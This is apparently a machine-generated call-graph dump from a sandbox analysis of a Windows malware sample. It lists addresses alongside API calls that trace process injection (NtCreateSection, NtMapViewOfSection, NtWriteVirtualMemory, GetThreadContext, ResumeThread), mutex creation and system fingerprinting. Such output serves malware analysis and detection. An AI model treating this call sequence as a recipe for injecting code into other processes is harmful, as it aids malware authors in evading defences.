11254->11218 11254->11219 11256 998da8 11255->11256 11257 996673 11255->11257 11258 998ddf 2 API calls 11256->11258 11259 99109a 11257->11259 11258->11257 11260 998ca3 2 API calls 11259->11260 11261 9910b5 11260->11261 11262 99fcda 11261->11262 11263 99fcf6 11262->11263 11267 996687 11263->11267 11324 998dc9 RtlAllocateHeap 11263->11324 11265 99fd09 11266 998ddf 2 API calls 11265->11266 11265->11267 11266->11267 11267->11227 11267->11228 11325 991080 11268->11325 11270 9964a6 11271 9964f8 11270->11271 11272 9964b7 11270->11272 11274 991080 2 API calls 11271->11274 11273 991080 2 API calls 11272->11273 11275 9964c1 11273->11275 11276 996502 11274->11276 11328 999fa5 11275->11328 11280 998d87 2 API calls 11276->11280 11278 9964d7 11279 998d87 2 API calls 11278->11279 11281 9964e2 11279->11281 11280->11281 11282 998ddf 11281->11282 11283 9966b5 11282->11283 11284 998de9 11282->11284 11283->11227 11284->11283 11285 998f63 memset 11284->11285 11286 998e19 HeapFree 11285->11286 11286->11283 11287->11237 11291 998dc9 RtlAllocateHeap 11288->11291 11290 998e3f 11290->11241 11291->11290 11304 998bcd 11292->11304 11311 998dc9 RtlAllocateHeap 11295->11311 11297 99f0cf 11297->11250 11298 99f0a0 11298->11297 11312 99ef38 11298->11312 11301 998d8f 11300->11301 11303 99663f 11300->11303 11302 998ddf 2 API calls 11301->11302 11302->11303 11303->11252 11305 998c05 11304->11305 11307 998be4 11304->11307 11306 998c4c lstrlenW 11305->11306 11308 998c58 11305->11308 11306->11308 11307->11305 11310 998dc9 RtlAllocateHeap 11307->11310 11308->11245 11308->11246 11310->11305 11311->11298 11313 99ef51 11312->11313 11314 99efac 11312->11314 11313->11314 11315 99f004 LoadLibraryA 11313->11315 11314->11298 11315->11314 11316 99f012 GetProcAddress 11315->11316 11316->11314 11317 99f01e 11316->11317 11317->11314 11319 998cc4 lstrlenW 11318->11319 11323 998dc9 RtlAllocateHeap 11319->11323 11322 998d4b 11322->11254 11322->11322 11323->11322 11324->11265 11326 998bcd 2 API calls 11325->11326 11327 991096 11326->11327 11327->11270 11332 998f63 11328->11332 11331 999fd3 11331->11278 11333 998f7d _vsnprintf 11332->11333 11334 998f6c memset 11332->11334 11333->11331 11334->11333 11347 99651e 11335->11347 11339 9963bd 11340 9963b3 11340->11339 11341 9963ed 11340->11341 11409 99d889 11340->11409 11343 996424 11341->11343 11344 99641d 11341->11344 11343->11339 11449 993597 11343->11449 11425 9961e8 11344->11425 11348 99f0d9 8 API calls 11347->11348 11349 996532 11348->11349 11350 99f0d9 8 API calls 11349->11350 11351 99654b 11350->11351 11352 99f0d9 8 API calls 11351->11352 11353 996564 11352->11353 11354 99f0d9 8 API calls 11353->11354 11355 99657d 11354->11355 11356 99f0d9 8 API calls 11355->11356 11357 996598 11356->11357 11358 99f0d9 8 API calls 11357->11358 11359 9965b1 11358->11359 11360 99f0d9 8 API calls 11359->11360 11361 9965ca 11360->11361 11362 99f0d9 8 API calls 11361->11362 11363 9965e3 11362->11363 11364 99f0d9 8 API calls 11363->11364 11365 9963a7 GetOEMCP 11364->11365 11366 99dfc2 11365->11366 11456 998dc9 RtlAllocateHeap 11366->11456 11368 99dfdd 11369 99dfe8 GetCurrentProcessId 11368->11369 11408 99e33d 11368->11408 11370 99e000 11369->11370 11457 99ca0a 11370->11457 11372 99e053 11373 99e064 11372->11373 11464 99ca5a 11372->11464 11473 99f3a0 11373->11473 11378 99e099 11379 99e0e9 GetSystemMetrics 11378->11379 11380 99e0e3 GetLastError 11378->11380 11381 99e110 11379->11381 11380->11379 11482 99c85a 11381->11482 11387 99e14b 11499 99c870 11387->11499 11392 998f63 memset 11393 99e1a2 GetVersionExA 11392->11393 11394 99e1b3 11393->11394 11518 99dde7 11394->11518 11396 99e1c0 GetWindowsDirectoryW 11397 999f85 2 API calls 11396->11397 11398 99e1e3 11397->11398 11399 998d9a 2 API calls 11398->11399 11400 99e21d 11399->11400 11408->11340 11615 99d7cd 11409->11615 11413 99d9ca 11414 998ddf 2 API calls 11413->11414 11417 99d9d5 11414->11417 11415 99d9b8 11415->11413 11416 998ddf 2 API calls 11415->11416 11416->11415 11417->11341 11418 998f63 memset 11424 99d8c6 11418->11424 11421 99d939 GetLastError 11645 99dadc ResumeThread 11421->11645 11423 99d963 FindCloseChangeNotification 11423->11424 11424->11413 11424->11415 11424->11418 11424->11421 11424->11423 11627 99be10 11424->11627 11632 99d9de 11424->11632 11715 99a79b 11425->11715 11428 9961f7 11428->11339 11429 99620f 11731 99601d 11429->11731 11435 996223 11438 996228 11435->11438 11439 996277 11435->11439 11436 996272 11766 9960d9 11436->11766 11441 996293 11438->11441 11444 99b6e3 7 API calls 11438->11444 11440 996270 11439->11440 11439->11441 11779 9a0ac8 11439->11779 11800 9960bf 11440->11800 11441->11339 11445 996248 11444->11445 11743 995c8c 11445->11743 12962 998dc9 RtlAllocateHeap 11449->12962 11451 99359e 11452 9935d5 11451->11452 12963 998dc9 RtlAllocateHeap 11451->12963 11452->11339 11454 9935af 11454->11452 11455 9998d0 2 API calls 11454->11455 11455->11452 11456->11368 11458 99ca21 11457->11458 11459 99ca25 11458->11459 11542 99c9f3 11458->11542 11459->11372 11462 99ca4a FindCloseChangeNotification 11463 99ca36 11462->11463 11463->11372 11555 99c92f GetCurrentThread 11464->11555 11467 99cb10 11467->11373 11468 99c986 6 API calls 11472 99ca8e FindCloseChangeNotification 11468->11472 11470 99cb06 11471 998ddf 2 API calls 11470->11471 11471->11467 11472->11467 11472->11470 11475 99f3bf 11473->11475 11474 99e08e 11477 99f365 11474->11477 11475->11474 11559 999ab3 11475->11559 11478 99f37c 11477->11478 11479 99f39c 11478->11479 11480 999ab3 RtlAllocateHeap 11478->11480 11479->11378 11481 99f389 11480->11481 11481->11378 11564 99c778 11482->11564 11484 99c86e 11485 99c64d 11484->11485 11486 99c668 11485->11486 11487 999f6b 2 API calls 11486->11487 11488 99c672 11487->11488 11579 9a36d5 11488->11579 11490 99c6bd 11491 998d87 2 API calls 11490->11491 11492 99c6c9 11491->11492 11495 999bd5 11492->11495 11493 99c687 11493->11490 11494 9a36d5 2 API calls 11493->11494 11494->11493 11496 999bdc 11495->11496 11497 999be1 MultiByteToWideChar 11495->11497 11496->11387 11498 999bf5 11497->11498 11498->11387 11500 999f6b 2 API calls 11499->11500 11501 99c88b 11500->11501 11502 999f6b 2 API calls 11501->11502 11504 99c89a 11502->11504 11503 99c92a 11512 99cbd7 11503->11512 11504->11503 11505 9a36d5 2 API calls 11504->11505 11506 99c8eb 11504->11506 11505->11504 11507 9a36d5 2 API calls 11506->11507 11508 99c916 11506->11508 11507->11506 11509 998d87 2 API calls 11508->11509 11510 99c922 11509->11510 11511 998d87 2 API calls 11510->11511 11511->11503 11513 99cbef 11512->11513 11514 99c986 6 API calls 11513->11514 11516 99cbf3 11513->11516 11517 99cc07 11514->11517 11515 998ddf 2 API calls 11515->11516 11516->11392 11517->11515 11517->11516 11519 99ddf1 11518->11519 11520 99ddf6 GetSystemInfo 11518->11520 11519->11396 11520->11396 11545 99c986 GetTokenInformation 11542->11545 11546 99c9a8 GetLastError 11545->11546 11553 99c9c5 11545->11553 11547 99c9b3 11546->11547 11546->11553 11554 998dc9 RtlAllocateHeap 11547->11554 11549 99c9bb 11550 99c9c9 GetTokenInformation 11549->11550 11549->11553 11551 99c9de 11550->11551 11550->11553 11552 998ddf 2 API calls 11551->11552 11552->11553 11553->11462 11553->11463 11554->11549 11556 99c94c 11555->11556 11557 99c950 GetLastError 11556->11557 11558 99c95d 11556->11558 11557->11558 11558->11467 11558->11468 11560 999abc 11559->11560 11562 999ace 11559->11562 11563 998dc9 RtlAllocateHeap 11560->11563 11562->11474 11563->11562 11565 998f63 memset 11564->11565 11566 99c79a lstrcpynW 11565->11566 11568 999f85 2 API calls 11566->11568 11569 99c7cf GetVolumeInformationW 11568->11569 11570 998d9a 2 API calls 11569->11570 11571 99c804 11570->11571 11572 999fe4 2 API calls 11571->11572 11573 99c825 lstrcatW 11572->11573 11577 99a5e9 11573->11577 11576 99c84b 11576->11484 11578 99a5f1 CharUpperBuffW 11577->11578 11578->11576 11580 9a36e5 11579->11580 11581 9a3718 lstrlenW 11580->11581 11582 9a3735 _ftol2_sse 11581->11582 11582->11493 11616 99d7e7 11615->11616 11646 998dc9 RtlAllocateHeap 11616->11646 11618 99d878 11618->11417 11623 99b6e3 11618->11623 11619 999f85 2 API calls 11621 99d81b 11619->11621 11620 998d9a 2 API calls 11620->11621 11621->11618 11621->11619 11621->11620 11622 999ab3 RtlAllocateHeap 11621->11622 11622->11621 11624 99b6fc 11623->11624 11647 99b632 11624->11647 11628 998f63 memset 11627->11628 11629 99be26 11628->11629 11630 998f63 memset 11629->11630 11631 99be33 CreateProcessW 11630->11631 11631->11424 11656 99d309 11632->11656 11639 998f63 memset 11640 99da24 GetThreadContext 11639->11640 11641 99da4e NtProtectVirtualMemory 11640->11641 11642 99dace 11640->11642 11641->11642 11643 99da90 NtWriteVirtualMemory 11641->11643 11703 99d47c 11642->11703 11643->11642 11644 99daad NtProtectVirtualMemory 11643->11644 11644->11642 11645->11424 11646->11621 11648 9a357b 2 API calls 11647->11648 11649 99b64a 11648->11649 11650 999f6b 2 API calls 11649->11650 11651 99b674 11650->11651 11652 999fa5 2 API calls 11651->11652 11653 99b6d2 11652->11653 11654 998d87 2 API calls 11653->11654 11655 99b6dd 11654->11655 11655->11424 11657 99d325 11656->11657 11658 99d337 11656->11658 11657->11658 11659 99d464 11657->11659 11660 999f85 2 API calls 11658->11660 11659->11642 11682 99d538 11659->11682 11661 99d344 11660->11661 11662 999fe4 2 API calls 11661->11662 11663 99d37d 11662->11663 11664 999f85 2 API calls 11663->11664 11665 99d39c 11664->11665 11708 999c50 11665->11708 11668 998d9a 2 API calls 11669 99d3c4 11668->11669 11670 999c50 2 API calls 11669->11670 11671 99d3e7 LoadLibraryW 11670->11671 11673 99d420 11671->11673 11674 99d412 11671->11674 11676 998ddf 2 API calls 11673->11676 11675 99f08e 3 API calls 11674->11675 11675->11673 11677 99d435 11676->11677 11678 998f63 memset 11677->11678 11679 99d447 11678->11679 11679->11659 11680 998ddf 2 API calls 11679->11680 11681 99d462 11680->11681 11681->11659 11683 99d56b 11682->11683 11684 99d58c NtCreateSection 11683->11684 11685 99d77f 11683->11685 11684->11685 11686 99d5b5 RegisterClassExA 11684->11686 11689 99d7b4 11685->11689 11695 99d7b0 NtUnmapViewOfSection 11685->11695 11687 99d609 CreateWindowExA 11686->11687 11688 99d645 NtMapViewOfSection 11686->11688 11687->11688 11690 99d633 DestroyWindow UnregisterClassA 11687->11690 11688->11685 11694 99d678 NtMapViewOfSection 11688->11694 11692 99d7c8 11689->11692 11693 99d7bd NtClose 11689->11693 11690->11688 11692->11639 11692->11642 11693->11692 11694->11685 11696 99d69c 11694->11696 11695->11689 11697 998e2e RtlAllocateHeap 11696->11697 11698 99d6ac 11697->11698 11698->11685 11699 99d6bb VirtualAllocEx WriteProcessMemory 11698->11699 11700 998ddf 2 API calls 11699->11700 11701 99d702 11700->11701 11702 99d765 lstrlenW 11701->11702 11702->11685 11704 99d493 11703->11704 11705 99d485 FreeLibrary 11703->11705 11706 99d4b4 11704->11706 11707 998ddf 2 API calls 11704->11707 11705->11704 11706->11424 11707->11706 11712 999c62 11708->11712 11710 999c81 11711 999c9e 11710->11711 11713 999c8d lstrcatW 11710->11713 11711->11668 11714 998dc9 RtlAllocateHeap 11712->11714 11713->11710 11714->11710 11804 99a7c6 11715->11804 11718 9a0cd9 11868 998dc9 RtlAllocateHeap 11718->11868 11720 9a0cea 11720->11429 11721 9a0ce0 11721->11720 11869 99b553 11721->11869 11724 9a0d2e 11724->11429 11729 9a0ac8 14 API calls 11730 9a0d2b 11729->11730 11730->11429 11906 99ab83 11731->11906 11734 996319 11735 99b6e3 7 API calls 11734->11735 11736 996336 11735->11736 11737 995c8c 10 API calls 11736->11737 11739 996219 11736->11739 11738 996370 11737->11738 11738->11739 11937 99ab69 11738->11937 11739->11435 11739->11436 11742 996382 lstrcmpiW 11742->11739 11744 99b6e3 7 API calls 11743->11744 11745 995ca5 11744->11745 11746 995cb2 11745->11746 11747 999bfd 2 API calls 11745->11747 11748 995cd5 11747->11748 11941 99b270 11748->11941 11750 995ce5 11751 995d09 11750->11751 11754 99b270 2 API calls 11750->11754 11752 998ddf 2 API calls 11751->11752 11753 995d15 11752->11753 11755 99618c 11753->11755 11754->11751 11756 99ab69 4 API calls 11755->11756 11757 996196 11756->11757 11758 9961a4 lstrcmpiW 11757->11758 11761 99619f 11757->11761 11759 9961ba 11758->11759 11760 9961d6 11758->11760 11946 99ac61 11759->11946 11763 998ddf 2 API calls 11760->11763 11761->11440 11763->11761 11995 998dc9 RtlAllocateHeap 11766->11995 11768 9960eb 11769 99612f 11768->11769 11770 9960fe GetDriveTypeW 11768->11770 11996 992bee 11769->11996 11770->11769 11772 99614b 11773 996169 11772->11773 12015 995315 11772->12015 12068 99b162 11773->12068 11777 99b162 2 API calls 11778 996185 11777->11778 11778->11439 11780 99109a 2 API calls 11779->11780 11781 9a0ad7 11780->11781 12606 9967db memset 11781->12606 11784 998d9a 2 API calls 11785 9a0afd 11784->11785 11799 9a0b76 11785->11799 12618 99aaff 11785->12618 11789 9a0b28 11790 99109a 2 API calls 11789->11790 11789->11799 11791 9a0b3a 11790->11791 11792 999fe4 2 API calls 11791->11792 11793 9a0b49 11792->11793 11794 99b787 2 API calls 11793->11794 11795 9a0b5c 11794->11795 11796 9a0b6a 11795->11796 12622 99af67 11795->12622 11798 998ddf 2 API calls 11796->11798 11798->11799 11799->11440 11801 9960d1 11800->11801 12635 9959f4 11801->12635 11843 998dc9 RtlAllocateHeap 11804->11843 11806 99a7f0 11807 9961f3 11806->11807 11844 99c5c6 11806->11844 11807->11428 11807->11429 11807->11718 11810 999f6b 2 API calls 11811 99a830 11810->11811 11812 99a96e 11811->11812 11816 99a85c 11811->11816 11813 99a9bf 11812->11813 11814 99a980 11812->11814 11815 999bfd 2 API calls 11813->11815 11818 999bfd 2 API calls 11814->11818 11838 99a96a 11814->11838 11815->11838 11816->11838 11854 999bfd 11816->11854 11817 998d87 2 API calls 11821 99a9df 11817->11821 11818->11838 11820 998ddf 2 API calls 11822 99aa75 11820->11822 11821->11820 11834 99aa3a 11821->11834 11825 998f63 memset 11822->11825 11824 99a924 11828 999bfd 2 API calls 11824->11828 11825->11834 11826 999f85 2 API calls 11827 99a8c2 11826->11827 11829 999c50 2 API calls 11827->11829 11832 99a94b 11828->11832 11831 99a8d4 11829->11831 11830 998ddf 2 API calls 11830->11807 11833 998d9a 2 API calls 11831->11833 11837 998ddf 2 API calls 11832->11837 11835 99a8e2 11833->11835 11834->11830 11834->11834 11860 999b26 11835->11860 11837->11838 11838->11817 11840 998ddf 2 API calls 11841 99a919 11840->11841 11842 998ddf 2 API calls 11841->11842 11842->11824 11843->11806 11845 99c5df 11844->11845 11846 9a36d5 2 API calls 11845->11846 11847 99c5ef 11846->11847 11848 999f6b 2 API calls 11847->11848 11850 99c5fe 11848->11850 11849 99c63a 11851 998d87 2 API calls 11849->11851 11850->11849 11852 9a36d5 2 API calls 11850->11852 11853 99a811 11851->11853 11852->11850 11853->11810 11855 999c0f 11854->11855 11866 998dc9 RtlAllocateHeap 11855->11866 11857 999c2c 11858 999c49 11857->11858 11859 999c38 lstrcatA 11857->11859 11858->11821 11858->11824 11858->11826 11859->11857 11861 999b5c 11860->11861 11862 999b2f 11860->11862 11861->11840 11867 998dc9 RtlAllocateHeap 11862->11867 11864 999b41 11864->11861 11865 999b49 MultiByteToWideChar 11864->11865 11865->11861 11866->11857 11867->11864 11868->11721 11870 99b56b 11869->11870 11874 99b564 11869->11874 11872 99b595 11870->11872 11870->11874 11900 998dc9 RtlAllocateHeap 11870->11900 11873 998ddf 2 API calls 11872->11873 11872->11874 11873->11874 11874->11724 11875 9a0b84 11874->11875 11901 998dc9 RtlAllocateHeap 11875->11901 11877 9a0cd1 11896 99fb9c 11877->11896 11878 9a0b97 11878->11877 11879 99109a 2 API calls 11878->11879 11884 9a0c86 11878->11884 11880 9a0bcd 11879->11880 11881 999f85 2 API calls 11880->11881 11883 9a0bf1 11881->11883 11882 998ddf 2 API calls 11882->11877 11885 999c50 2 API calls 11883->11885 11884->11882 11886 9a0c0f 11885->11886 11887 99b553 3 API calls 11886->11887 11888 9a0c1c 11887->11888 11889 998d9a 2 API calls 11888->11889 11890 9a0c28 11889->11890 11891 998d9a 2 API calls 11890->11891 11894 9a0c31 11891->11894 11892 998ddf 2 API calls 11893 9a0c7b 11892->11893 11895 998ddf 2 API calls 11893->11895 11894->11892 11895->11884 11897 99fbc0 11896->11897 11902 9a0485 11897->11902 11900->11872 11901->11878 11904 9a049e 11902->11904 11903 9a04bf lstrlenW 11905 99fbd2 11903->11905 11904->11903 11904->11904 11905->11729 11909 99ab93 11906->11909 11914 99acb3 11909->11914 11912 998ddf 2 API calls 11913 99602f 11912->11913 11913->11734 11915 99acd5 11914->11915 11928 99a766 11915->11928 11917 99abac 11917->11912 11917->11913 11918 99acdf 11918->11917 11931 99ceb8 11918->11931 11920 99adac 11921 998ddf 2 API calls 11920->11921 11921->11917 11922 99ad13 11922->11920 11923 9a0485 lstrlenW 11922->11923 11924 99ad64 11923->11924 11926 998e2e RtlAllocateHeap 11924->11926 11927 99ad87 11924->11927 11925 998ddf 2 API calls 11925->11920 11926->11927 11927->11925 11935 998dc9 RtlAllocateHeap 11928->11935 11930 99a772 11930->11918 11932 99cede 11931->11932 11934 99cee2 11932->11934 11936 998dc9 RtlAllocateHeap 11932->11936 11934->11922 11935->11930 11936->11934 11938 99ab6e 11937->11938 11939 99acb3 4 API calls 11938->11939 11940 99637e 11939->11940 11940->11739 11940->11742 11942 99b27a 11941->11942 11943 99b27f 11941->11943 11942->11750 11944 99b2a1 GetLastError 11943->11944 11945 99b296 GetLastError 11943->11945 11944->11942 11945->11942 11962 99ac6f 11946->11962 11949 99c402 SetFileAttributesW 11950 998f63 memset 11949->11950 11951 99c42f 11950->11951 11952 99c450 11951->11952 11953 9a36d5 2 API calls 11951->11953 11952->11760 11954 99c46c 11953->11954 11955 999fe4 2 API calls 11954->11955 11956 99c47d 11955->11956 11957 999c50 2 API calls 11956->11957 11958 99c48e 11957->11958 11958->11952 11983 99c32f 11958->11983 11963 99ac7f 11962->11963 11966 99adde 11963->11966 11967 99adfb 11966->11967 11971 9961cb 11966->11971 11968 9a36d5 2 API calls 11967->11968 11967->11971 11969 99ae3f 11968->11969 11982 998dc9 RtlAllocateHeap 11969->11982 11971->11760 11971->11949 11972 99ae53 11972->11971 11973 9a357b 2 API calls 11972->11973 11974 99ae95 11973->11974 11975 9a0485 lstrlenW 11974->11975 11976 99aed6 11975->11976 11977 99a766 RtlAllocateHeap 11976->11977 11980 99aee2 11977->11980 11978 99af4c 11979 998ddf 2 API calls 11978->11979 11979->11971 11980->11978 11981 998ddf 2 API calls 11980->11981 11981->11978 11982->11972 11984 99c352 11983->11984 11985 99c35a memset 11984->11985 11994 99c3c9 11984->11994 11986 999f85 2 API calls 11985->11986 11995->11768 11997 991080 2 API calls 11996->11997 11998 992c07 11997->11998 12076 99b330 11998->12076 12001 998d87 2 API calls 12002 992c2a 12001->12002 12003 992c5a 12002->12003 12004 991080 2 API calls 12002->12004 12003->11772 12005 992c38 12004->12005 12085 999124 12005->12085 12008 998d87 2 API calls 12009 992c56 12008->12009 12009->12003 12093 99b12f 12009->12093 12011 992c70 12106 9994d4 12011->12106 12014 998ddf 2 API calls 12014->12003 12191 99f1c7 12015->12191 12018 995582 12018->11773 12019 99c85a 9 API calls 12020 99533a 12019->12020 12021 99b6e3 7 API calls 12020->12021 12022 995346 12021->12022 12204 99b222 12022->12204 12024 995352 12024->12018 12025 99f0d9 8 API calls 12024->12025 12026 995371 12025->12026 12027 999f85 2 API calls 12026->12027 12028 995382 12027->12028 12029 999c50 2 API calls 12028->12029 12030 99539b 12029->12030 12069 99b171 12068->12069 12075 99617d 12068->12075 12071 998ddf 2 API calls 12069->12071 12074 99b196 12069->12074 12070 998ddf 2 API calls 12072 99b1a1 12070->12072 12071->12069 12073 998ddf 2 API calls 12072->12073 12073->12075 12074->12070 12075->11777 12077 999b26 2 API calls 12076->12077 12079 99b350 12077->12079 12078 9a36d5 2 API calls 12078->12079 12079->12078 12080 99b39d 12079->12080 12081 998ddf 2 API calls 12080->12081 12082 99b3a8 12081->12082 12083 998e2e RtlAllocateHeap 12082->12083 12084 992c1a 12082->12084 12083->12084 12084->12001 12086 999133 12085->12086 12090 992c47 12085->12090 12118 998dc9 RtlAllocateHeap 12086->12118 12088 99913d 12088->12090 12119 999029 12088->12119 12090->12008 12092 998ddf 2 API calls 12092->12090 12094 999124 4 API calls 12093->12094 12095 99b074 12094->12095 12096 99b13d 12095->12096 12162 9992a4 12095->12162 12096->12011 12100 99b128 12100->12011 12101 99b120 12102 9994d4 6 API calls 12101->12102 12102->12100 12103 99b08e 12103->12100 12103->12101 12104 998e5d 3 API calls 12103->12104 12168 999a76 12103->12168 12104->12103 12107 9994e3 12106->12107 12117 992c7b 12106->12117 12108 99951d 12107->12108 12109 998ddf 2 API calls 12107->12109 12107->12117 12114 99952d 12108->12114 12173 9995fb 12108->12173 12109->12107 12111 998ddf 2 API calls 12113 999548 12111->12113 12112 99955e 12116 998ddf 2 API calls 12112->12116 12113->12112 12115 998ddf 2 API calls 12113->12115 12114->12111 12114->12113 12115->12112 12116->12117 12117->12014 12118->12088 12133 998dc9 RtlAllocateHeap 12119->12133 12121 99903e 12124 999066 12121->12124 12128 99904b 12121->12128 12134 99957a 12121->12134 12122 9990ea 12125 998ddf 2 API calls 12122->12125 12122->12128 12124->12122 12126 9990b4 12124->12126 12127 99957a lstrlenW 12124->12127 12125->12128 12126->12122 12126->12128 12138 99fd9c 12126->12138 12127->12126 12128->12090 12128->12092 12131 999104 12133->12121 12135 99959a 12134->12135 12136 9a0485 lstrlenW 12135->12136 12137 9995be 12136->12137 12137->12124 12153 998dc9 RtlAllocateHeap 12138->12153 12140 99fdc0 12150 99ff2f 12140->12150 12154 998dc9 RtlAllocateHeap 12140->12154 12141 998ddf 2 API calls 12143 99ff55 12141->12143 12145 998ddf 2 API calls 12143->12145 12144 99fde0 12144->12150 12155 998dc9 RtlAllocateHeap 12144->12155 12146 99ff63 12145->12146 12148 9990e3 12146->12148 12149 998ddf 2 API calls 12146->12149 12148->12122 12148->12131 12149->12148 12150->12141 12151 99fdf4 12151->12150 12156 998e5d 12151->12156 12153->12140 12154->12144 12155->12151 12161 998dc9 RtlAllocateHeap 12156->12161 12158 998e72 12161->12158 12165 9992c7 12162->12165 12163 998dc9 RtlAllocateHeap 12163->12165 12164 9993fb 12167 998dc9 RtlAllocateHeap 12164->12167 12165->12163 12165->12164 12166 998ddf 2 API calls 12165->12166 12166->12165 12167->12103 12169 999a81 12168->12169 12171 999a97 12168->12171 12172 998dc9 RtlAllocateHeap 12169->12172 12171->12103 12172->12171 12185 998dc9 RtlAllocateHeap 12173->12185 12175 99963e 12175->12114 12176 999634 12176->12175 12177 999667 12176->12177 12179 9996e5 12176->12179 12186 998fb1 12177->12186 12180 9a0485 lstrlenW 12179->12180 12183 9996dd 12180->12183 12184 998ddf 2 API calls 12183->12184 12184->12175 12185->12176 12187 9a36d5 2 API calls 12186->12187 12192 99f1dd 12191->12192 12197 995328 12191->12197 12193 999f6b 2 API calls 12192->12193 12194 99f1e9 12193->12194 12195 999f6b 2 API calls 12194->12195 12196 99f1f8 12195->12196 12196->12197 12198 99f205 GetModuleHandleA 12196->12198 12197->12018 12197->12019 12199 99f219 12198->12199 12200 99f212 GetModuleHandleA 12198->12200 12201 998d87 2 API calls 12199->12201 12200->12199 12202 99f224 12201->12202 12203 998d87 2 API calls 12202->12203 12203->12197 12205 99b236 12204->12205 12206 99b23c GetLastError 12205->12206 12207 99b246 GetLastError 12205->12207 12208 99b253 12206->12208 12207->12208 12208->12024 12628 998dc9 RtlAllocateHeap 12606->12628 12608 996816 12614 996987 12608->12614 12629 998dc9 RtlAllocateHeap 12608->12629 12610 998ddf 2 API calls 12612 996979 12610->12612 12611 996896 12611->12610 12613 998ddf 2 API calls 12612->12613 12613->12614 12614->11784 12615 998f63 memset 12616 996830 12615->12616 12616->12611 12616->12614 12616->12615 12617 99c402 11 API calls 12616->12617 12617->12616 12630 99ab0e 12618->12630 12621 998dc9 RtlAllocateHeap 12621->11789 12623 99af73 12622->12623 12624 99a766 RtlAllocateHeap 12623->12624 12626 99af9b 12624->12626 12625 99b000 12625->11796 12626->12625 12627 998ddf 2 API calls 12626->12627 12627->12625 12628->12608 12629->12616 12631 99acb3 4 API calls 12630->12631 12632 99ab2d 12631->12632 12633 99ab0b 12632->12633 12634 998ddf 2 API calls 12632->12634 12633->11799 12633->12621 12634->12633 12636 99aaff 4 API calls 12635->12636 12637 995a05 12636->12637 12640 995a67 12637->12640 12671 99b423 12637->12671 12640->11441 12641 99abf8 6 API calls 12642 995a2b 12641->12642 12676 99f537 12642->12676 12645 99b6e3 7 API calls 12646 995a49 12645->12646 12646->12640 12683 99a29b 12646->12683 12650 995a7f 12701 991486 CreateMutexW 12650->12701 12652 995a84 12672 99a1f8 GetSystemTimeAsFileTime 12671->12672 12673 99b42e 12672->12673 12674 99abc9 6 API calls 12673->12674 12675 995a19 12674->12675 12675->12641 12677 99f0d9 8 API calls 12676->12677 12678 99f549 12677->12678 12679 99f0d9 8 API calls 12678->12679 12680 99f562 12679->12680 12780 99f4c6 12680->12780 12682 995a32 12682->12645 12685 99a2ac 12683->12685 12684 995a71 12687 99a398 12684->12687 12685->12684 12794 998dc9 RtlAllocateHeap 12685->12794 12689 99a3b6 12687->12689 12688 99a3ba 12688->12650 12689->12688 12690 99a40e 12689->12690 12795 99a2ee 12689->12795 12694 99a41f 12690->12694 12801 998dc9 RtlAllocateHeap 12690->12801 12692 99b222 2 API calls 12695 99a484 12692->12695 12694->12688 12694->12692 12696 99a4fa SetThreadPriority 12695->12696 12696->12688 12702 99149f CreateMutexW 12701->12702 12712 9914ec 12701->12712 12702->12712 12712->12652 12781 99f510 12780->12781 12782 99f4d4 12780->12782 12783 999f6b 2 API calls 12781->12783 12793 998dc9 RtlAllocateHeap 12782->12793 12785 99f51a 12783->12785 12786 999a76 RtlAllocateHeap 12785->12786 12787 99f526 12786->12787 12790 998d87 2 API calls 12787->12790 12788 99f4e5 12789 99f533 12788->12789 12791 998ddf 2 API calls 12788->12791 12789->12682 12790->12789 12792 99f509 12791->12792 12792->12682 12793->12788 12794->12684 12797 99a2f8 12795->12797 12796 99a31d 12800 998f63 memset 12796->12800 12797->12796 12798 998ddf 2 API calls 12797->12798 12799 99a333 12797->12799 12798->12796 12799->12689 12800->12799 12801->12694 12962->11451 12963->11454 11203 996438 11204 996448 ExitProcess 11203->11204 14384 9926b6 14385 9926c7 14384->14385 14390 9926df 14384->14390 14392 9970a0 14385->14392 14389 999e22 2 API calls 14391 9926f8 14389->14391 14415 99267d 14390->14415 14393 9970ba 14392->14393 14394 9970c2 14392->14394 14393->14390 14395 99bfc8 2 API calls 14394->14395 14396 9970cb 14395->14396 14396->14393 14422 9a0e8e 14396->14422 14399 998ddf 2 API calls 14399->14393 14402 99670a 5 API calls 14403 99712d 14402->14403 14404 99713a 14403->14404 14406 997152 14403->14406 14405 998ddf 2 API calls 14404->14405 14405->14393 14414 997172 14406->14414 14441 995c05 14406->14441 14408 998ddf 2 API calls 14409 9971a4 14408->14409 14410 998ddf 2 API calls 14409->14410 14412 9970e5 14410->14412 14411 99716e 14413 99abf8 6 API calls 14411->14413 14411->14414 14412->14399 14413->14414 14414->14408 14416 99bfc8 2 API calls 14415->14416 14417 99268e 14416->14417 14418 9926a5 14417->14418 14421 9926b2 14417->14421 14447 99adc2 14417->14447 14420 998ddf 2 API calls 14418->14420 14420->14421 14421->14389 14423 9a0ed9 14422->14423 14424 9a0e9d 14422->14424 14446 998dc9 RtlAllocateHeap 14423->14446 14425 998ddf 2 API calls 14424->14425 14427 9a0ea6 14425->14427 14428 998e2e RtlAllocateHeap 14427->14428 14430 9970df 14427->14430 14429 9a0ebd 14428->14429 14429->14430 14431 99fb9c lstrlenW 14429->14431 14430->14412 14432 999993 14430->14432 14431->14430 14433 999f85 2 API calls 14432->14433 14434 9999a3 14433->14434 14435 9998e9 2 API calls 14434->14435 14436 9999c2 14435->14436 14437 999c50 2 API calls 14436->14437 14438 9999d4 14437->14438 14439 998d9a 2 API calls 14438->14439 14440 99711b 14439->14440 14440->14393 14440->14402 14442 99b6e3 7 API calls 14441->14442 14443 995c28 14442->14443 14444 995c40 14443->14444 14445 99b787 2 API calls 14443->14445 14444->14411 14445->14444 14446->14427 14448 99adde 6 API calls 14447->14448 14449 99add9 14448->14449 14449->14418 14450 9929ab 14451 992a10 14450->14451 14456 9929bf 14450->14456 14452 9929ff 14451->14452 14462 991b07 14451->14462 14454 999e22 2 API calls 14452->14454 14455 992a2a 14454->14455 14456->14452 14457 99abf8 6 API calls 14456->14457 14458 9929ec 14457->14458 14459 99abf8 6 API calls 14458->14459 14460 9929f7 14459->14460 14461 99abf8 6 API calls 14460->14461 14461->14452 14468 991b1c 14462->14468 14463 991b86 14464 99a1f8 GetSystemTimeAsFileTime 14463->14464 14466 991b90 GetCurrentThread 14464->14466 14465 99a1f8 GetSystemTimeAsFileTime 14465->14468 14470 991bb7 DuplicateHandle 14466->14470 14467 991c17 14467->14452 14468->14463 14468->14465 14468->14467 14471 998f63 memset 14470->14471 14472 991bca 14471->14472 14482 992c8f 14472->14482 14476 991bfd 14477 991c0c 14476->14477 14516 996ea8 14476->14516 